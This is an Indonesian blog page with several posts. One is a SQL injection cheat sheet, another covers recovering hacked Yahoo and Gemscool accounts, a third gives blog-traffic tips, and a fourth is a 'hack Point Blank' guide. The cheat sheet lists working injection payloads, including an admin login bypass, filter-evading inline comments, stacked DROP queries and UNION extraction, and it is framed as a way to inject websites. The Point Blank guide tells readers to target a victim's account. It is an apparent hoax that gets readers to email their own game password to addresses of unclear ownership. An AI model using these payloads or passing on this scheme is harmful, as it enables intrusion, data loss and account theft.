Tuesday, 31 December 2013

Tutorial SQL Injection


Udah pada tau kan soal SQL injection?
Disini ga akan dibahas gimana cara inject nya tapi berbagai syntax yang bisa kita gunakan
untuk menginject suatu website (jika emang bisa diinject).
Oke, lets’ begin
Syntax SQL Injection
1. Commenting out.
Gunanya untuk mengakhiri suatu query, bypass query.
+ SQL Server
Syntax: –
Penggunaan: DROP namatabel;–
+ MySQL
Syntax: #
Penggunaan: DROP namatabel;#
Contoh penggunaan in real life:
* Username: admin’–
* Proses query yang terjadi di server:
SELECT * FROM userlist WHERE username=’admin’–’ AND password=’password’;
Query ini akan memberikan km akses sebagai admin karena query selanjutnya setelah — akan diabaikan
2. Inline comment
Gunanya untuk mengetahui versi SQL server yang digunakan atau untuk bypass script proteksi
+ SQL Server (MySQL juga bisa)
Syntax: /*Comment*/
Penggunaan: DROP/*comment*/namatabel
atau: DR/**/OP/*bypass proteksi*/namatabel
atau: SELECT/*menghindari-spasi*/password/**/FROM/**/userlist
+ MySQL (mendeteksi versi)
Syntax: /*!MYSQL Special SQL*/
Penggunaan: SELECT /*!32302 1/0,*/1 FROM namatabel
Note: Syntax juga bisa digunakan jika versi MySQL lebih tinggi dari 3.23.02 (sesuai query), tidak berfungsi untuk versi dibawahnya
3. Staking queries
Gunanya untuk menyambung 2 buah query dalam 1 transaksi.
+ SQL Server
Syntax: ;
Penggunaan: SELECT * FROM namatabel; DROP namatabel–
4. Pernyataan IF
Ini kunci jika melakukan Blind SQL Injection, juga berguna untuk testing sesuatu yang ga jelas secara akurat
+ SQL Server
Syntax: IF kondisi bagian-true ELSE bagian-false
Penggunaan: IF (1=1) SELECT ‘true’ ELSE SELECT ‘false’
+ MySQL
Syntax: IF(kondisi,bagian-true,bagian-false)
Penggunaan: SELECT IF(1=1,’true’,’false’)
5. Operasi String
Gunanya untuk bypass proteksi
+ SQL Server
Syntax: +
Penggunaan: SELECT login + ‘-’ + password FROM userlist
+ MySQL Server
Syntax: ||
Penggunaan: SELECT login || ‘-’ || password FROM userlist
Note: Jika MySQL server dalam mode ANSI syntax berfunsi. Cara lain adalah dengan menggunakan fungsi CONCAT() dalam MySQL.
Syntax: CONCAT(str1,str2,str3,…)
Penggunaan: SELECT CONCAT(login,password) FROM userlist
6. Union Injection
Gunanya menggabungkan 2 tabel yang berbeda dengan syarat tabel itu harus sama jumlah kolomnya.
Syntax: UNION
Penggunaan: ‘ UNION SELECT * FROM namatabel
atau: ‘ UNION ALL SELECT * FROM namatabel
atau: ‘ UNION SELECT kolom1,kolom2 FROM namatabel
Proses yang terjadi dalam query:
SELECT * FROM user WHERE id=’1′ UNION SELECT kolom1,kolom2 FROM namatabel
Jika tabel tersebut mempunyai kolom yang berbeda, maka dapat ditambahkan null atau 1
Penggunaan: ‘ UNION SELECT 1,kolom1,kolom2 FROM namatabel

Wednesday, 27 November 2013

Mengembalikan Akun Email Yahoo yang di-Hack

Susah membayangkan bagaimana rasanya ketika email kita dihack oleh orang-orang yang tidak bertanggungjawab. Kita terpaksa harus mengklarifikasi ke teman-teman yang dikirimi email fishing yang biasanya meminta kita mengirimkan sejumlah uang yang dibutuhkan ke alamat tertentu.
Untuk mengatasi itu, YahooMail telah memberikan beberapa langkah yang barangkali bisa kita gunakan untuk mengatasi masalah tersebut.
Berikut ini langkah-langkah yang barangkali bisa kita gunakan untuk mengembalikan YahooMail kita yang telah dihack seseorang.
1. Masuk ke halaman login YahooMail

2. Di halaman login, klik “Tidak Bisa Mengakses Account”

3. Setelah mengklik “Tidak Bisa Mengakses Account” akan muncul panel berikut ini.

4. Kita bisa mencoba dua pilihan yang tersedia, yakni (1) “saya lupa sandi saya”; atau (2) “Tampaknya akun saya digunakan orang yang tidak berwenang”; seperti tertera di gambar di atas.
Jika akun kita memilih pilihan kedua “Tampaknya akun saya digunakan orang yang tidak berwenang”, tampilan selanjutnya setelah kita menekan tombol “berikutnya” adalah sebagai berikut.

5. Setelah muncul laman di atas, masukkan ID Yahoo dan jangan lupa berikut kode yang tertera di bawahnya. Selanjutnya klik tombol “Berikutnya”. Setelah itu semua selesai, akan muncul panel seperti dibawah.

6. Ada dua pilihan yang tertera, yakni melalui email yang telah kita sertakan sebelumnya atau “Saya tidak bisa mengakses satupun dari yang disebut di atas”. Untuk percobaan ini, saya memilih “Saya tidak bisa mengakses satupun dari yang disebut di atas”. Selanjutnya klik tombol “Berikutnya” dan munculah panel di bawah.

7. Biasanya, Yahoo meminta kita untuk memasukkan dua pertanyaan rahasia. Pertanyaan-pertanyaan itu akan kembali harus kita jawab pada saat ini. Jika sudah, seperti biasa, klik tombol, “Berikutnya”.

8. Jika sudah berhasil, gambar di atas akan muncul dan kita bisa dengan bebas memasukkan sandi baru. Usahakan sandi yang kita gunakan berisi kombinasi huruf, angka, dan simbol, yang diganti secara periodik.
Kembali klik tombol “Berikutnya” hingga muncul gambar berikut ini.

9. Klik tombol “Lanjutkan” untuk memperbaiki informasi personal anda.


10. Seperti biasa, setelah itu klik “lanjutkan” atau “berikutnya” sehingga muncul laman di bawah.

11. Pada laman itu, kita bisa langsung melanjutkan, dengan mengklik tombol “Lanjutkan” atau mempertebal pengamanan akun kita dengan menggunakan “segel masuk”. Klik “Informasi Lebih Jauh” untuk membuat segel masuk. Setelah mengklik itu, anda akan masuk pada laman segel seperti dibawah ini.

12. Klik tombol “Mulai Sekarang”.

Ada dua bentuk segel, yakni segel dalam bentuk teks dan segel dalam bentuk gambar (lihat gambar di bawah).

Segel dalam bentuk teks terdiri dari tiga kolom dengan maksimal teks yang tertulis 21 karakter. Teks itu bisa kita isi dengan informasi-informasi yang hanya kita yang tahu.
Jika memilih segel dalam bentuk gambar, tinggal masukkan gambar dengan ukuran maksimal 2 MB.
ini adalah preview setelah saya memasukkan segel dalam bentuk gambar.

kita sudah bisa menggunakan email kita kembali.

Catatannya, ini adalah prosedur yang disarankan oleh Yahoo. Saya tidak tahu jika ternyata dalam praktiknya ada hal-hal yang kurang diantisipasi oleh Yahoo atau kalau ternyata si hacker telah lebih dulu mengubah semua informasi pribadi kita.
Tapi setidaknya, ini adalah langkah yang patut dicoba manakala kita dihadapkan pada masalah akibat dihack-nya email kita.
Terakhir, selamat mencoba, semoga berhasil!

Monday, 21 October 2013

Cara Meningkatkan Pengunjung Blog

Posted by Erda Meikeyana Tuesday, 10 September 2013 0 komentar
Jika anda memiliki sebuah toko apa hal yang berperan penting dalam kemajuan toko anda? Tentu saja adanya pengunjung. Begitu pula dengan blog, jika tak ada pengunjung apa jadinya sebuah blog? mungkin blog anda akan menjadi suatu yang sia-sia walau isinya bermanfaat.

Traffic pengunjung sangat mempengaruhi rangking blog anda. Semakin banyak pengunjung maka akan semakin kecil rangking yang di dapat. Itu artinya semakin besar peluang mendapatkan keuntungan untuk anda yang melakukan monetisasi pada blog.
Banyak website yang menawarkan jasa meningkatkan traffic pengunjung secara instan. Memang ada kalanya  website tersebut bisa meningkatkan traffic, tapi itu sangat sedikit sekali yang benar. Justru lebih banyak website yang hanya ingin mengambil untung dari anda alias hanya menipu.

Biasanya website seperti itu hanya akan mengambil data anda untuk kepentingan mereka sendiri. Maka dari itu lebih baik kita memakai cara-cara yang sederhana namun terbukti dapat meningkatkan pengunjung, walau tidak instan tapi aman.

Cara Meningkatkan Pengunjung Blog


Untuk itu mari kita lihat bagaimana trik untuk meningkatkan traffic pengunjung pada blog anda.

Cara Meningkatkan Pengunjung Blog

1. Buatlah Konten yang Berkualitas

Konten atau artikel adalah unsur utama dari sebuah blog. Terkadang kita sering kali menemukan artikel yang sangat panjang tapi terlalu banyak kata-kata yang tidak diperlukan sehingga sulit untuk dipahami.

Memang artikel yang baik adalah artikel yang panjang, tapi kita harus memperhatikan apa yang sebenarnya akan dijelaskan pada artikel tersebut dan apa kata-kata yang tepat untuk digunakan sehingga tidak berbelit-belit agar pembaca mudah menyerap.

Konten atau artikel sebaiknya berisi jawaban dari sebuah pertanyaan atau tips-tips. Misalnya hal yang sedang menjadi topik hangat saat ini adalah gadget terbaru. Maka sebaiknya anda menuliskan tentang gadget terbaru tersebut mulai dari harga hingga yang lainnya.

Jangan lupa juga memperhatikan judul dan keyword yang dipakai pada artikel tersebut. Kenapa? karena ini sangat berpengaruh untuk meningkatkan pengunjung. Maka sebaiknya anda melakukan riset terlebih dahulu sebelum menentukan judul dan keyword yang akan dipakai.

Gunakanlah google adwords untuk meriset judul/keyword. Usahakan mengupdate artikel secara rutin agar blog anda tidak sepi pengunjung.

2. Segera Daftarkan Blog pada Serch Engine

Akan percuma rasanya jika sudah memperhatikan kualitas konten tetapi tidak mendaftarkan blog anda pada search engine. Karena jika tidak terdaftar, maka otomatis blog anda tidak dapat ditelusuri pada search engine karena tidak terindex oleh search engine tersebut.

3. Loading Harus Cepat

Apa yang anda lakukan bila mendapatkan blog atau website yang loadingnya lama? Ya! pasti anda akan kesal dan mengeluh. Lalu setelah itu anda mengklik tombol close dan mencari artikel lain yang lebih cepat loadingnya.

Jangan sampai itu terjadi pada blog anda, karena bisa-bisa pengunjung merasakan hal yang sama. Itu sangat buruk dan bisa mempengaruhi rangking blog anda. Usahakan pilih template yang ringan agar membuat pengunjung anda merasa nyaman dalam menelusuri blog anda.

4. Perhatikan Desain Blog

Siapa yang tidak tertarik dengan desain yang menarik? Desain yang unik dan menarik tentu saja membuat pengunjung merasa nyaman ketika melihat-lihat isi blog.

Semua tertata rapi dan enak dilihat karena ada navigasi yang jelas, terlebih lagi jika desainnya sesuai dengan isi dari blog tersebut. Jadi jangan menyepelekan desain pada blog agar pengunjung semakin banyak yang tertarik mengunjungi blog anda.

5. Manfaatkan Jejaring Sosial

Jejaring sosial adalah hal yang sangat digemari saat ini oleh semua kalangan. Hanya dengan online kita dapat berbagi informasi menarik kepada teman-teman, mendapatkan teman baru, membuat grup,  dan masih banyak yang dapat kita lakukan.

Magnet yang terdapat pada jejaring sosial memang sangatlah tidak terduga, karena saat jejaring sosial yang satu diluncurkan selang beberapa bulan/tahun muncul jejaring sosial lain.

Dan ini membuat orang-orang di masa kini tidak terlepas dari gadget mereka yang sudah difasilitasi dengan aplikasi jejaring sosial seperti facebook, twitter, dll.

Melihat dari boomingnya jejaring sosial maka anda dapat memanfaatkannya untuk meningkatkan jumlah pengunjung, jd setelah mempublikasi artikel jangan lupa bagikan artikel di jejaring sosial/media sosial.

6. Sering-Sering Melakukan Blogwalking

Jangan merasa blog anda paling bagus dan paling lengkap, sehingga anda malas meminta backlink pada blogger lain. Blogwalking sangat penting untuk mendapatkan backlink dari blog lain. Ini adalah hubungan timbal balik yang dilakukan seorang blogger untuk meningkatkan traffic pengunjung.

Bagaimana dengan Cara Meningkatkan Pengunjung Blog yang kami jelaskan tadi? tidak sulit bukan? jika anda mau bersabar dalam menerapkannya, dapat dipastikan pengunjung blog akan semakin meningkat. Sekian yang dapat kami ulas, selamat mencoba!

Thursday, 17 October 2013

Cara Mengembalikan ID Gemscool Point Blank yang di Hack

Apa anda merasa ID Gemscool di curi atau di Hack? Mungkin beberapa tips Cara Mengembalikan ID Gemscool Point Blank yang di Hack dibawah ini bisa meyelesaikan masalah meskipun sebenarnya tidak 100% bisa berjalan mulus, tapi tentunya yang namanya usaha yah pasti lebih baik dari pada pasrah dan tidak melakukan apa2.
Oh ya ID Gemscool ini sembenarnya merupkana informasi login untuk menggunakan semua game online yang ada di gemscool seperti Game Online Point Blank (PB), FreeStyle Street Basketball, Yulgang, Apocalyps, Atlantica, Lost Saga, Mako, dll. Jadi intinya jika ID Gemscool anda sudah di Hack maka kemungkinan besar char Game Online lain anda juga sudah di sabotase.

Adapun beberapa cara untuk mengembalikan ID Gemscool yang di curi/kena hack ialah:
1. Cara pertama dengan Reset password melalui fasilitas Lupa Password
2. Cara kedua dengan mengirim Email ke id@gemscool.com, tentunya untuk memberi konfirmasi ke email tersebut anda harus melengkapi data selengkap-lengkapnya (Jangan sampai salah yah…), pastikan saat mengirim pesan gunakan email yang sama dengan email saat pertama kali daftarkan di Gemscool dan pastikan  juga mengirim email disaat jam kerja agar mudah di proses (kalau bukan jam kerja atau informasi yang di berikan ada sedikit saja salah, takutnya nanti email ga di tanggapin/langsung di delete aja). Nah Adapun informasi yang perlu anda berikan pada Email ialah seperti.
  • ID Gemscool
  • Nickname PB / atau game lain
  • Nama Anda
  • Alamat lengkap
  • No Telepone
  • No Handphone
  • Tanggal lahir
  • Email (Yang anda gunakan untuk Mendaftarkan Id Gemscool pertama kali)
  • Security Code / Question & Answer:
  • Kode voucher yang telah di isi sebelum dan sesudah car bermasalah.
  • Kalau mau nambahin cerita kronoli kejadiannya lebih bagus lagi.
Info: bagi yang merasa proses sangat sulit itu dikarenakan
  • Email asal buat, salah dan tidak aktif.
  • Data2 penting : misalnya security code, tidak ada yang diingat.
  • Jual Beli ID.
  • Share ID.
3. Cara ketiga dengan Konfirmasi Pihak Gemscool di
PT. KREON,
Gedung Gandaria 8 20th Floor,
Jl. Sultan Iskandar Muda, Kebayoran Lama Jakarta Selatan 12240
No Tlp : 021-2930 3499 / Fax : 021-2930 3496

Cara Hack PB Murni tanpa software terbaru 2013

Posted by Farhan Hamzah On 1/02/2013 06:01:00 PM
saya mempersembahkan Artikel ini khusus untuk
yang mau berusaha dan sedikit mikir ( karena cara ini cukup sulit )
Walau sulit ini sudah terbukti berhasil.kalo ada kesalahan sedikit saja
pasti gagal,Namun Kalau anda ada kemauan untuk bekerja keras dalam meraih
keberhasilan pastikan anda focus dan jeli dalam melaksanakannya
Cara ini mungkin hanya akan ada di blog gozine saja
karena cara ini adalah cara yang saya temukan sendiri
Nah Perlu bukti.anda tinggal Lihat saja Berapa ID saya di Blog jual beli
Saya baru kasih Artikel ini karena saya sudah puas dengan apa
yang sudah saya hack dan saya curi.
Sabar yahhh kalo sedikit susah.Berikut Caranya

1.Tentukan Korban  berikut contoh : Nickname : korban123
                                                          ID            : ID korban 123
                                                        Pangkat     :pangkat korban
2.Pangkat yang anda gunakan harus sesuai dengan pangkat korban
   contoh : kalo pangkat diamond anda juga harus diamond :
   misalkan : diamond 1 dengan diamond 2 juga bisa
3.Buka cmd ( start-run-ketikan cmd )
4.Kalo udah ketikan perintah seperti ini : ping www.gemscool.com
5.Nahh nanti kan ada angka atau ping dari perintah tersebut.
6.Angka atau ping tersebut menandakan  lokasi server anda
7.Bukalah Notepad.Ketikan code berikut ini
   Nickname korban : korban123
   Id korban  :ID korban 123
   pangkat korban
8.save as dengan ekstensi : .Pb   misalkan : korban.Pb
9.Masuk mozilla firefox.pilih option
  dalam pengaturan pilihlah tool lalu pilih lagi advanced
  setelah masuk pilihlah network
10.Di sini akan ada beberapa pilihan.yang anda harus pilih adalah : use proxy with setting
     dalam form IP.isikan dengan ping atau angka yang di dapat lewat cmd tadi
     portnya wajib pilih : 98 ( ini port resmi gemscool )
11.Setelah selesai.anda di wajibkan untuk masuk ke google crome
     atau browsing yang beda dengan mozilla
12.Dalam browsing kunjungilah www.whatismyip.com
13.disitu anda akan melihat Ip yang akan anda gunakan
14.salinlah Ip itu lalu masuk lagi ke mozilla firefox ( wajib )
15.Ganti IP yang tadi anda masukan ke dalam mozilla dengan ping pb
     menjadi IP yang anda salin tadi di www.whatismyip.com
16.Daftar lah di www.driveHQ.com

17.masuklah ke tab yang baru dengan mengirim email ke
     admin@gemscool.com. isi pesannya yaitu : Izin atau permition
18.setelah anda mengirim email.barulah masa-masa bahagia anda akan dimulai
19.Uploadlah file yang sudah anda save dengan notepad...oploadnya di yahoo
20.Lampirkan emailnya ke email ini : mailer_daemon@yahoo.com
21.kalo ga kekirim berarti anda harus mengirim email alternatif ke
     admin@gemscool.com
22.selanjutnya bila anda sudah mendaftar driveHQ.apa yahhh ????
     (jangan deg-degan yahh)soalnya ini adalah tahap semi final
23.pastikan anda sudah menyetting proxy nya sesuai dengan ket no15
24.Bila No.23 gagal bisa di pastikan ID point blank anda akan terkena banned
25.maka dari itu cobalah terlebih dahulu dengan menggunakan
     id yang baru saja anda buat.contohnya.tengkorak
26.Bila mencoba dengan tengkorak anda berhasil.
     Bisa di pastikan anda juga dapat berhasil di langkah berikutnya
27.Sesudah anda yakin dengan langkah-langkahnya.anda hanya tinggal
     login ke dalam account drive HQ anda.
     lalu kirimlah email lewat webmail ke email berikut :
     "PointBlankGemscool"
     caranya adalah setelah anda masuk ke dalam account anda
     pilihlah ke dalam email.setelah  masuk ke dalam email
     anda harus mengirim email alias sent
     cara sentnya yaitu dengan menekan "New"
     lalu pilih mail
28.Isi Pesannya sebagai berikut :
     To : PointBlankGemscool
     subject : permited retreiving ID my friend
     Isi pesannya : -ID korban
                           -nickname
                           -Pangkat korban
                           -pasword korban ( paswordnya harus ditulis : generatorpasword )
                           -ID anda
                           -nickname anda
                           -pangkat anda
                           -pasword anda ( pasword pb anda )
29.eitt jangan senang dulu karena bila anda hanya mengirim satu email
     saja.kemungkinan id andalah yang akan terkena banned oleh admin
     gemscool karena di anggap penipuan.
30.maka dari itu buktikanlah bahwa anda sudah mengirim email permisi
     yang tadi anda kirim ke admin@gemscool.com sebagai bukti bahwa
     anda telah mendapatkan izin dari sang admin gemscool
     berikut isi pesan kedua
     Ohh iya pesan kedua Di kirim ke alamat email yang berbeda yahh
     berikut emailnya : EntrypermitGemscool
     isi pesannya yaitu
     To : EntrypermitGemscool
     subject : Permition to pointblankgemscool@drivehq.com
     isi pesannya yaitu :
     Saya sudah meminta izin dengan melalui email "admin@gemscool.com"
     maka dari itu saya meminta saudara untuk mengirimkan
     email konfirmasi izin atas "emailsaya@yahoo.com" yang telah
     mengirimkan email ke pihak gemscool yang beratasnamakan
     "PointBlankGemscool@drivehq.com"
     Saya Mohon kepada saudara untuk mengirimkan konfirmasi kode
     izin saya dengan mengirim email ke "emailsaya@yahoo.com"
31.Bila anda sudah mendapatkan email balasan dari entrypermitgemscool
     (kira-kira 1-2 hari lahh ya) isi pesan yang anda terima berupa
     konfirmasi kode
32.Jangan Panik setelah ID Pb anda terkena Banned
     karena saya juga terkena banned terlebih dahulu
     maka dari itu setelah ID anda terkena banned
     Barulah anda kirim kan email konfirmasi
     yang anda terima dari entrypermitgemscool
     tadi.Berikut contohnya
     To : pointblankgemscool
     subject : Banned Blockir
     isi pesannya yaitu :
     "Saya akan membuktikan bahwa saya tidak menipu kepada anda
      Berikut pembuktian saya.
      Konfirmasi Code : masukan kode konfirmasi anda dengan tepat
      dan jangan sampai salah memasukan kode konfirmasi"
32.Setelah anda mengirim email itu
     kira-kira setelah 1-2 jam
     anda akan mendapatkan email balasan seperti ini
     "sorry for my rudeness because it has been blocked
      pointblank you identify.this I include a request that you ask
      Nickname korban : nickname korban
      pasword korban :pasword korban berupa pasword korban yang asli
      pangkat : pangkat korban berupa pangkat asli dari korban
      Email (email ini adalah email yang akan anda gunakan untuk lupa pasword)
      emailnya biasanya adalah : email yang anda gunakan untuk mengirim email
      ke pointblankgemscool
      secara otomatis email dan security code anda akan di ganti 
      berikutnya anda hanya tinggal mengganti pasword yang di berikan
      gemscool kepada anda
33.Terakhir anda tinggal mengganti pasword pb korban anda
      yang telah di berikan gemscool pula.
34.Jangan lupa berterimakasih ke pada saya yang telah bersusah
      payah bekerja,dan jangan lupa pula menglike fanPage 
      yang telah saya siapkan

Bila anda kurang mengerti silahkan langsung komentar 
atau kirim email seperti biasa ke email saya 
Semoga artikel ini tidak anda gunakan secara berlebihan
dan harus anda batasi karena kalau berlebihan
bisa-bisa cara ini malah tidak bekerja lagi
terimakasih.

Note : Mohon maaf karena mailer bot saat ini tidak aktif dan tidak
bekerja lagi.kemungkinan karena banyaknya permintaan yang tidak
valid.
Powered by Blogger.

 
Design by Free WordPress Themes | Bloggerized by Iptek-4u - Premium Blogger Themes | Best Buy Coupons